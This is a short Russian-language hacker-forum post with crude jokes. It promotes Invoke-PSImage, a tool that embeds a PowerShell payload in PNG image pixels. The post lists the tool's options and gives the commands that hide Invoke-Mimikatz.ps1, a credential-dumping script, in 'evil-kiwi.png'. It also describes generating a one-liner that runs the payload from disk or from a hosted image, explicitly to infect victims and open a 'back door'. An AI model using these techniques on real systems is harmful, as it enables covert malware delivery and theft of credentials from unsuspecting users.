Две новости и все хорошие!)
Новый
mimikatz

Бля, понять не могу что у них за логотип?) У этих епнутых англичан...
ии.... гвоздь сегодняшнего дня! та-дааам... Заражаем через )) PNG то есть в картинке в пикселях "полезная" нагрузка (PAYLOAD) нам же стоит только закинуть считыватель этого трояна, который в свою очередь считывает код с картинки и откроет нам?
правильно,) "задний проход" через который мы с успехом и залезем!) Фу бля( пишу и дурная картинка перед глазами встала...
изображение 1920x1200
-Script [путь к файлу ] Путь к скрипту для вставки в изображение.
-Image [filepath] Изображение для встраивания скрипта в.
-Out [filepath] Файл для сохранения полученного изображения (изображение будет PNG)
-Web Выведите команду для чтения изображения из Интернета вместо чтения из файла. Вам нужно будет разместить изображение и вставить URL-адрес в команду.
Создаём картинку со "сценарием" «Invoke-Mimikatz.ps1», встроенным в него, и выведите oneliner для выполнения с диска, то есть офлайн или в локалке, методика так себе, не очень..
Код:
Код:
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
[Oneliner to execute from a file]
Создаём картинку с вложенным в него "сценарием" «Invoke-Mimikatz.ps1» и выведите oneliner для выполнения из интернета, то есть вешаем на хост) и пусть висит с пикселями волшебными..
Код:
Код:
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png -Web
[Oneliner to execute from the web]
Invoke-PSImage
Удачи!